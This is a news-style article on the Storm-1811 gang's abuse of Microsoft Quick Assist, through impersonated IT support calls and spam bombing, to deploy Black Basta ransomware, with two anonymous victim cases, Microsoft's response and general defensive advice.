Cybercrime Gang Abuses Microsoft Quick Assist to Deploy Black Basta Ransomware

Recently, multiple cybersecurity agencies have uncovered that a cybercrime gang known as Storm-1811 has been exploiting Microsoft’s Quick Assist application to carry out social engineering attacks, deploying the Black Basta ransomware. This malicious activity has been ongoing since mid-April, causing significant damage to numerous businesses and individual users. 

Attack Mechanism Revealed

Storm-1811 primarily employs voice phishing (Vishing) and spam email bombardment to lure target users into their trap. Impersonating IT support personnel, they contact victims by phone, claiming to help resolve computer issues and guide them to grant remote access via Quick Assist. Specifically, the attackers instruct the victims to press the shortcut CTRL+Windows+Q to launch Quick Assist and enter a security code. Once access is granted, the attackers gain full control over the victim’s computer.

After gaining control, the attackers use keyboard commands to download and install remote management tools (such as ScreenConnect and NetSupport Manager) and malicious software (including QBot and Cobalt Strike). These tools enable the attackers to move laterally within the victim’s network, expanding the scope of the attack.

Real-World Cases

1. A Financial Services

Company:A financial services company utilizing Managed Detection and Response (MDR) services fell victim to an attack. The attackers gained remote access by bombarding the administrator with spam emails and phishing calls, subsequently deploying Black Basta ransomware and encrypting critical financial data. Although the company took immediate action to recover the data, the incident resulted in losses amounting to millions of dollars.

2. A Healthcare Facility

The IT department of a healthcare facility received a call from someone posing as technical support, requesting to resolve system issues via Quick Assist. Trusting the call, the IT team granted access, allowing the attackers to take control of the entire medical system and encrypt patient records and medical data. This attack not only inflicted millions of dollars in financial losses but also severely disrupted patient care.

Microsoft’s Response

Microsoft has acknowledged the misuse of Quick Assist and is investigating these attacks. They plan to enhance the security of Quick Assist by adding warning messages and increasing transparency and trust between users. Microsoft advises users and organizations to block or uninstall Quick Assist and other remote management tools if not in use, to reduce the risk of such social engineering attacks.

Additionally, Microsoft has provided a comprehensive set of compromise indicators and threat-hunting queries to help customers detect malicious activities in their networks. For example, monitoring for suspicious cURL behavior or the potential malicious use of proxies and tunnel tools can aid in early detection and prevention of attacks.

Preventive Measures

To safeguard against similar social engineering attacks, cybersecurity experts recommend that users and organizations increase security awareness training, remain vigilant against unsolicited calls, and verify the legitimacy of technical support requests. Regularly reviewing and updating security policies and ensuring strict control over the use of remote management tools are also crucial.

The recent attacks by the Storm-1811 gang leveraging Quick Assist highlight the critical need for robust cybersecurity measures and heightened awareness. Both enterprises and individual users must work together to create a safer digital environment.